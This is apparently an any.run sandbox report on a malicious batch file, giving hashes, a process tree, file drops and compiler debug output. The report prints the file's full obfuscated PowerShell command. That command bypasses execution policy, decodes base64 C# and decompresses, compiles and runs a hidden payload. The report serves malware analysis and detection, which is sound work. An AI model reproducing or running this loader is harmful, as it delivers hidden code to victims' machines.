File name: | itlala.bat |
Full analysis: | https://app.any.run/tasks/f8fe8781-a27c-475b-bc10-36fd0b1621b4 |
Verdict: | Malicious activity |
Analysis date: | October 14, 2019, 10:02:38 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MIME: | text/plain |
File info: | ASCII text, with very long lines, with CRLF line terminators |
MD5: | FB05C57CD1936FFB0CEAB5BEAEFCCD3D |
SHA1: | B6017C7FABABEAC6169752BFF618980FEE00E06A |
SHA256: | 9D4E16A3F2632F42AF871B3B80BED7E1EA8F443EB7AED9E6EAA214784D3EB508 |
SSDEEP: | 96:YwEYxbBpzZmyUT8vlNjAaNxQRA4MdYEk6UDP1FvO7EkQ0aWWfZ:5x3Ku5AavEA4l56UDP1I7bWfZ |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2744 | cmd /c ""C:\Users\admin\AppData\Local\Temp\itlala.bat" " | C:\Windows\system32\cmd.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2252 | powersHeLl -nop -NonintErACti -Win 000000000000001 -exEcutioNpo bypASs .(('Set-'+'Va')+'ri'+('a'+'ble')) -Name ('dq') -Value ([Text.Encoding]::"\"Ut`F8"\"."\"Get`sT`RiNG"\"([Convert]::(('F'+'ro')+('m'+'Ba')+'se'+'64'+('S'+'tri'+'ng')).Invoke(('dXNpbmcgU3lzdGVtOw0KdXNpbmcgU3lzdGVtLkNvbGxlY3Rpb'+'25zLk9iamVjd'+'E1vZGVsOw0KdXNpbmcgU3lzdGVtLk1hbmFnZW1lbnQuQXV0b21hdGlvbjsNCnVzaW5nIFN5c3RlbS5UZXh0Ow0K'+'dXNpbmcgU3lzdGVtLklPOw0KdXNpbmcgU3lzdGVtLklPLkNv'+'bXByZXNzaW9uOw0KDQpwdWJsaWMg'+'Y2xhc3MgSk9iVnpqQnlKd0lnRVBxd1lMdkxEZWFsVXtwdWJsaWMgc3RhdGljIHZvaWQgZFJhVVljT0NjRWZucUFHbUlsWktGY1Fucigpe1Bvd2VyU2hlbGwgcHMgPSBQb3dlclNoZWxsLkNyZWF0ZSgpOw0Kc3RyaW5nIGZyZT0iSXdnQUFCK0xDQUFBQUFBQUJBQk5'+'sY2Z'+'PM0lv'+'TmhWL0Zpd3Y0TjVSWWRWVHVUb'+'TJrVWUvTjhFSjkxSHRGSGo3am0wMTJCQThKRUNSNHZpK05QLzQ5TURX'+'Zk90L3N5M1p5OWVkTC8ybXZWazUzRmg5bitmejE5WDhsSDQzVlZjUGlGN3ZTKzU5Y1hpaXh3eS9Pbk1mcTE2K1AydVdkYm9YMlA0bmYzMzZsZytibGx2UDc3NytmODlBbDhaTGp'+'tTzFZcjc3OCt2WTk4S0k1b3dhTU42RFpxQjlMN'+'2E5SHlW'+'MDRTKzZqM'+'Ex5R0RiT1Jqa'+'nZqcTI0'+'dmtRNVNZVFBrVjluQ1ZBYWk5WFkxSTBQUjYrUll0d0xmRVdESnhMUnZ'+'ZWnpiRGh5'+'Z1hoYW8valdBbnRnNkR4TnU0UTFZM09jQTQ3Z0lnRnM0bjZUS0d3Z'+'1JXVDJDMkVUSG9DNlZYUG41ZXRqcFpGQlJSd3dIYUw5elFpWDdRSkNqaHNqQlk2VnVvWXlaZXF'+'udVdKSWE0dUh1UUdVVVRIak5ROFNUeTRwcytTVUtycDNxeTc'+'0alJFe'+'TFIa1Y0V1pFdHNKT3QvR0NjZVphbmpyTENxRHRGQVNnazhvNVFEK21kaFhsbjkxTzNhZ0N2VWM4SmVmUkhMTDI5bmdtWE14K1ZuSGtZL2wxN3BVald0a25iMEpOVDJKbUVMbGwrTnB1ODkvQ1VTQmxFZ2NqeTdwSmx'+'mVGJ4TStsZFd6N0ppaVJBRi9Ua3Z1c0ltamhobG10S1'+'lRejlrRHRDMHNwWDU5RnIzTEVLczRrL2xKZWVITjVKY3U'+'4U0xEZkRwSFVES1JJaHVsWExpYUp1emJybHM4MmVFSzYybHlQSERCL0xTYzR4YytUK2dxUXpWa2t4M0tsQUxXa0ZWQ'+'1FSNHJrV2tTKytvcXNENEljUHhydkZkREVPVXdISEZyVmEzVXZ3WjV'+'rVFVzamFMNEJqT2dwbFZvNnNncWRieW9SRStXeVVZZ2UxaFNzbTdNdEt'+'XMHdKekNDTm5oc1pucnRu'+'Y2h5dTdnVmU2aVVWO'+'UcxRjZwOUx2UWt5ZnJqNm5mcE9jTTJOM3pNTTErSnpOcmNqZFpnNkx5MUNva1B6cGxFazl'+'xeTcwT1NaTWdzSHVKLzhoQkUwNFN'+'ZQXBIV1dRNC9kV'+'EpCMEZTQmVXRUlnNkh6UW43SGFPYmFob2wwR'+'2RCWnprYWFmNm1FaXpIRGVOMVVLaU45R3ZkUW5EOWllNU5
6eW16WTJYZHg2dkZHQ'+'0tVU3RkaFdodzZrWEwwcHUxN1NQMXcwb3JIWDBlM2R'+'hUlpvcDh3MVdnOG1TTTU4YVpncEhodHVQRFZCME1yRXlLUGVzd2tGZDBxcFNjZ3AxSHZNNlFqTnNVczJtRHQ1VHJJV'+'2RXMStrNWdQT0JMMC'+'92Mk'+'gwbStFL1l5Z29xcnlzamRMbWZmTFI1cnFaeDVOeUtyUzBJYmR5Qksxc2pCR1h5M1V6UXA2QjJKc1loZSs3TW'+'ppV2xBdkNFVzl'+'tVVB4M05nZ3'+'g3ejR2RzREWk'+'hGckk5ZjBvL1lLR3VFYmFPcGJndlV'+'2Y3QydTlqTjB1SHl6UTRMbHZhenpTRmk2bW1JTVFwUGpyaVJzWlBQTGRvVk44MXErcHpLVGxCdlFvSkdtR0xxT3RQRzU1dUJlRlFBaFNpUy9FWlV2cW9jTjZqTmV1THZsQnRqL29YblM4cW9GWElNbmlaTTBseXRGT'+'U5RSW9kVVRjR1hXMitENEhKZHdtYStzejdQQ'+'kpTYnBEaUVHZkp'+'LSyt5clZ4T1NERlNPZHNzeEIv'+'RUFSTFN4cFJ1Tnc2cmlRa1g4c05hdmNLSWF6dH'+'h4UDE3R'+'isrY2tYWVNOOHhEcmtCNEtDaStuN0MxanZDSkpxWHBMeVJucGl6MHdUWmV3VGlGcTBOMCsybV'+'hUSWp'+'kbzZIVDdVc1FxREdCZ0ZNVGtPRU5LbHRha3kyWVlpc2FJY1Z'+'lbVIxbUFrZk5Rc1NVclBtazR2OElsQ0NseWVpcGp5Zk1HS2M0aU01'+'NFBFQlljdml1Rm4rVWtMQ2JzSWNJU2wrTkR3TzVRdnoyV0RJRmZVNWc0L0pwTldRVUxzaDByZ1Zqa1ZIcTE0cXRuZ24yaU9KVTVXdnpJSzFLV045eXh'+'SU2FrSlVmVURyY3o4MUdhd1BTRzdBNmwyaytpVUU3dFZzQ2UyeERxcXNSZ21xRlVnai9hc1VNbEhFZGNVa0ZwWXk0Wk5pZHFJYmF0M1FOaXdEaHJnRG9aRnYrbzhkcUNFRjZzakhNWXNzZVlHRUE1d01IRTlnYVd4QTN2TGk3SVpjNjNPSnYreGU4UU'+'ZBNkprdVQ5Y2haamt1RkpWYU0zbHBaM3ZHeGlCeDdTYmN2Y'+'m'+'UxOUF4RU5ObjltYjI3VE1oN2xRTTZaVythRzVkSDBTRUMrV2l4VnEvaTBZcnRzOE5lM1RraTRoZ2tsMjd4L2drRlF3Mz'+'BCTVpHWUptWWp1dUJIR2pCTDVkcnphSmNjUUFDS2hvOWhB'+'bHh6b'+'1VLSEJKZlMramlBTk1TU0RiQjlwd0dJcWw5MmpldVliQTJvLzFkYjV1ckFkeXpKTVBrQWdL'+'WFk3M0pEK3hSdFl3bE9KaEhaMko2TjNFVms3en'+'gyaE42Rm0yQUdMQ1p'+'VTklhMmdqUzlFVkM'+'1SE'+'RmdThBU3lSYlR1eERCWVc5OUpteXAzSWJLWE5tQm1NcGROMmdQYU4xSjV2dTNILy8'+'2dFlUMitnZk93eDhBanpOdkw2K2gveWUyOG1XcEJxM1RPZjdEMlN4bmh6ODVlL254'+'NlhMeWMvMlphK3pBVlZyNVVlbUZmV'+'lUvZnZ5Y1AyaGZoMXpqdm43ODUrZlh0Ny9zTjk4cVZmWUwvZzM4dFlqNS8yTDBOL0Q5L1A3anZ3cVE3VFFqQ0FBQSI7DQpieXRlW10gZ1ppcEJ1ZmZlcjIgPSBDb252Z'+'XJ0LkZyb21CYXNlNjRTdHJpbm'+'coZnJlKTt1c2luZyAodmFyIG1lbW9yeVN0cmVhbSA9IG5ldyBNZW1vcnlTdHJlYW0oKSl7aW50IGRhdGFMZW5ndGggPSBCaXRDb252ZXJ0ZXIuVG9JbnQzMihnWmlwQnVmZmVyMiwgMCk7bWVtb3J5U3RyZWFt
LldyaXRlKGdaaXBCdWZmZXIyLCA0L'+'CBnWmlwQnVmZmVyMi5MZW5ndGggLSA0KTt2YXIgYnVmZmVyID0gbmV3IGJ5dG'+'VbZGF0YUxlbmd0aF07'+'bWVtb3J5U3RyZWFtLlBvc2l0aW9uID0gMDt1c2luZyAodmFyIGdaaXBTdHJlYW0gPSB'+'uZXcgR1ppcFN0'+'cmVhbShtZW1vcnlTdHJlYW0sI'+'ENvbXByZXNzaW9uTW9kZS5EZWNvbXByZXNzKSl7Z1pp'+'cFN0cmVhbS5SZWFkKGJ1ZmZlciwgMCwgYnVmZmVyLkxlbmd0aCk7fWZyZT0oRW5jb2RpbmcuVVRGOC5HZXRTdHJpbmcoYnVmZmVyKSk7fQ0KcHMuQWRkU2Ny'+'aXB0KGZyZSk7cHMuSW52b2tlKCk7fX0='))));.('Ad'+('d-T'+'ype')) -TypeDefinition ${dQ};[JObVzjByJwIgEPqwYLvLDealU]::('d'+('R'+'aUY'+'cOC')+('cE'+'fnq')+'AG'+'mI'+('lZ'+'KFcQnr')).Invoke() | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2440 | "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\ijmcfqca.cmdline" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | — | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Visual C# Command Line Compiler Exit code: 1 Version: 8.0.50727.4927 (NetFXspW7.050727-4900) | ||||
2420 | "C:\Windows\explorer.exe" | C:\Windows\explorer.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Explorer Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2580 | "C:\Windows\explorer.exe" | C:\Windows\explorer.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Explorer Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2252 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PKVXUH64Q0M6M2DSKZ9P.temp | — | |
MD5:— | SHA256:— | |||
2440 | csc.exe | C:\Users\admin\AppData\Local\Temp\ijmcfqca.pdb | — | |
MD5:— | SHA256:— | |||
2440 | csc.exe | C:\Users\admin\AppData\Local\Temp\ijmcfqca.out | — | |
MD5:— | SHA256:— | |||
2252 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:35375F3D71AE42AA9777154D256B33BF | SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF | |||
2252 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF39a6e9.TMP | binary | |
MD5:35375F3D71AE42AA9777154D256B33BF | SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF | |||
2252 | powershell.exe | C:\Users\admin\AppData\Local\Temp\ijmcfqca.cmdline | text | |
MD5:EB06EA4803DD2B690C2161FECFB71E12 | SHA256:02DCDDBA38B22BF70450534D54589A23652FE1EA19DF8EA6C98ABFDD27D827B0 | |||
2252 | powershell.exe | C:\Users\admin\AppData\Local\Temp\ijmcfqca.0.cs | text | |
MD5:03D5D9EEE5C82DFD30330B80FF0E58E9 | SHA256:1A25B6E5B17421FAC5BF765671E268DFAC0B8C0C669A4742A2D369EA01BDCB5B |
Process | Message |
---|---|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|